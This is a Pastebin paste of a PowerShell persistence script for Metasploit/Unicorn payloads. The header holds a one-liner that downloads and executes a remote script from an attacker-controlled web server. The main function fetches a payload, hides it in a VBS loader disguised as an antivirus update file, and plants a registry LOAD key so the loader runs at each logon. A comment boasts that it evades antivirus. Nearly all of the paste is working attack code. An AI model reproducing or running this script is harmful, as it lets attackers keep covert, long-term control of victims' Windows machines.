Alonnso_888

PersistenceMetasploit2

Jan 18th, 2019
161
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # powershell-persistence.ps1
  2. # Author: @curi0usJack
  3. #
  4. # Assumes your target has the ability to download files
  5. #
  6. # 1) Use Unicorn to generate your encoded powershell command. This command will be used for persistence when the user logs in.
  7. # 2) Save to a text file somewhere you can download it.
  8. # 3) Call this from your shell:
  9. #   powershell.exe -window hidden -exec bypass -noni -c "IEX (New-Object Net.WebClient).DownloadString('http://WEBSERVER/powershell-persist.ps1'); Add-Persistence http://WEBSERVER/powershell_attack.txt"
  10. #
  11. # Kudos to @slobtresix for the initial model. Modified to work directly with unicorn payloads.
  12. #
  13. #
  14. function Add-Persistence()
  15. {
  16.     param
  17.     (
  18.         [parameter(Mandatory=$true)]
  19.         [string]
  20.         $payloadurl
  21.     )
  22.    
  23.     # Default saving the payload to the %TEMP% directory
  24.     $tmpdir = $env:APPDATA
  25.    
  26.     # Change this if desired.
  27.     $payloadvbsloaderpath = "$tmpdir\update-avdefs.vbs"
  28.  
  29.     # Determine if user is admin. Not required, but nice to know.
  30.     $admin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
  31.     if ($admin -eq $true)
  32.         { Write-Host "[+] User is a local administrator!" }
  33.     else
  34.         { Write-Host "[-] User is not a local administrator." }
  35.  
  36.     # Download and verify the payload.
  37.     Write-Host "[+] Downloading payload $payloadurl"
  38.     $payload = (New-Object Net.WebClient).DownloadString($payloadurl)
  39.    
  40.     $payloadlength = $payload.Length
  41.     if ($payloadlength -gt 0)
  42.         { Write-Host "[+] Payload length: $payloadlength bytes" }
  43.     else
  44.     {
  45.         Write-Host "[!] Payload length: 0 characters. Is the web server up?"
  46.         return
  47.     }
  48.    
  49.     # Create the VBS file and insert the powershell command from unicorn.
  50.     Write-Host "[+] Creating VBS loader."
  51.     $vbs = "Set oShell = CreateObject( ""WScript.Shell"" )`r`n"
  52.     $vbs += "ps = ""$payload""`r`n"
  53.     $vbs += "oShell.run(ps),0,true"
  54.     $vbs | Out-File $payloadvbsloaderpath -Force
  55.    
  56.     # Mark the file as hidden.
  57.     Write-Host "[+] Marking $payloadvbsloaderpath as Hidden."
  58.     $fileObj = get-item $payloadvbsloaderpath -Force
  59.     $fileObj.Attributes="Hidden"
  60.    
  61.     # Set the LOAD key. Haven't been caught by AV yet. ;-)
  62.     Write-Host "[+] Updating registry with a LOAD key"
  63.     Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows" -Name LOAD -Value $payloadvbsloaderpath
  64.  
  65.     Write-Host "[+] Done!"
  66. }
  67.  
  68. function Remove-Persistence()
  69. {
  70.     $appdir = $env:APPDATA
  71.     $payload = "$appdir\update-avdefs.vbs"
  72.    
  73.     if (Test-Path $payload)
  74.     {
  75.         Remove-Item -Path $payload -Force
  76.         Write-Host "[+] Found and removed $payload."
  77.     }
  78.     else
  79.         { Write-Host "[-] $payload not found." }
  80.        
  81.     $reg = Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows"
  82.     if ($reg.LOAD -eq $payload)
  83.     {
  84.         Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows" -Name LOAD
  85.         Write-Host "[+] Found and removed LOAD registry key."
  86.     }
  87.     else
  88.         { Write-Host "[-] LOAD registry key not found." }
  89.    
  90.     Write-Host "[+] Done."
  91. }
Add Comment
Please, Sign In to add comment